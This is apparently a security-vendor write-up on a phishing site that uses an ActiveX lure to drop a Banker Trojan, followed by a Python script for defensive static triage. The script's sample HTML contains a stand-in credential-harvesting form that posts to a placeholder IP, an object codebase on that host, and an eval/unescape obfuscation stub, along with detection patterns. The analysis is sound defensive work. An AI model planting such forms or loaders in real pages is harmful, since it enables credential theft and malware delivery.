Just recently, Trend Micro discovered an FTP server in Uruguay that hosts a phishing Web site targeting customers of Telecom Italia Mobile (TIM), one of the largest mobile phone companies in Brazil.
The server’s IP address indicates that it may belong to Russian or Ukrainian cyber criminals who have previously been linked to RBN, the Russian Business Network. RBN was made notorious for its “bullet-proof” hosting facilities, which have been linked to illegal activities such as child pornography, phishing, spam, and malware distribution.
The site’s INDEX.HTML file embeds an ActiveX control that invites the user to view a video message purportedly from TIM Brazil. When the control is accessed, it attempts to plant malicious code on the client system and then send phishing messages to the affected user. The file changes daily and points to a new fraudulent URL, which is emailed to everyone who already fell victim to the bogus Web site.
Phishing is a technique used to trick users into divulging personal information (such as social security numbers, ATM PINs, and credit card numbers) through email or dubious Web sites. Perpetrators forge the Web site or email of a legitimate company and use it to coax gullible users into sending them private or personal information. These Web sites or email messages usually ask for information about the recipient, and the code of the bogus pages or messages is altered so that whatever the user submits is redirected to the cyber criminals instead of the company being imitated. When a user is tricked into divulging information this way, we say that (s)he has become the victim of a “phishing attack.”
The ActiveX control is already detected by Trend Micro as POSSIBLE_MLWR-1. The malicious URL hides the source of the downloadable file behind an obfuscated code script and ultimately downloads a Banker Trojan downloader, win.exe, from a host located in Brazil; that host is already blocked by our URL filtering services.
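The two mechanisms described above, a cloned page whose forms post the victim’s data to the criminals’ server and an obfuscated script that hides where the embedded control fetches its payload from, can both be spotted statically before anything is rendered. The following triage script is an added example and is not Trend Micro’s code or detection logic; the sample HTML, the placeholder host names (203.0.113.10, legit.example) and the obfuscation markers it looks for are constructed for the demonstration and are not indicators taken from the actual site.

```python
"""Static triage of a suspected phishing page (added example).

Given the HTML of a page that imitates a legitimate site, flag:
  (a) forms whose action submits to a host other than the imitated one,
  (b) <object> embeds (the way an ActiveX control is placed on a page),
  (c) inline scripts built from common obfuscation primitives
      (unescape/%xx runs, String.fromCharCode, eval).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page. 203.0.113.10 and legit.example are
# documentation placeholders, not real indicators from the TIM case.
SAMPLE_HTML = """
<html><body>
<form action="http://203.0.113.10/cgi-bin/login.php" method="post">
  <input name="cpf"><input name="senha" type="password">
</form>
<form action="/local/search" method="get"><input name="q"></form>
<object classid="clsid:XXXX" codebase="http://203.0.113.10/view.cab"></object>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74'));</script>
<script>var a = 1;</script>
</body></html>
"""

# Primitives that decode-then-execute a hidden string. Any one of them is
# not proof of malice, but a script made only of these is worth a look.
OBFUSCATION_MARKERS = (
    re.compile(r"\bunescape\s*\("),
    re.compile(r"String\.fromCharCode\s*\("),
    re.compile(r"\beval\s*\("),
    re.compile(r"(?:%[0-9a-fA-F]{2}){8,}"),   # long run of %xx escapes
)


class PhishTriage(HTMLParser):
    """Collects (finding_kind, detail) tuples while the page is parsed."""

    def __init__(self, expected_host):
        super().__init__()
        self.expected_host = expected_host.lower()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A relative action has no hostname and is treated as same-site.
            host = urlparse(a.get("action", "")).hostname
            if host and host.lower() != self.expected_host:
                self.findings.append(("form_offsite", host))
        elif tag == "object":
            # Record where the control claims to load its code from.
            self.findings.append(("activex_object", a.get("codebase") or a.get("classid", "")))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            hits = sum(1 for m in OBFUSCATION_MARKERS if m.search(body))
            if hits:
                self.findings.append(("obfuscated_script", hits))


def triage(html, expected_host):
    """Return the list of findings for `html`, a page claiming to be `expected_host`."""
    parser = PhishTriage(expected_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_HTML, "legit.example"):
        print(kind, detail)
```

On the sample page the script reports the login form posting to 203.0.113.10 rather than the imitated site, the object embed with its codebase URL, and one script that combines eval, unescape and a long run of %xx escapes; the plain `var a = 1;` script and the relative-action search form are left alone. To find the real download source behind such a script, the next step would be to decode the escaped string offline rather than let a browser execute it.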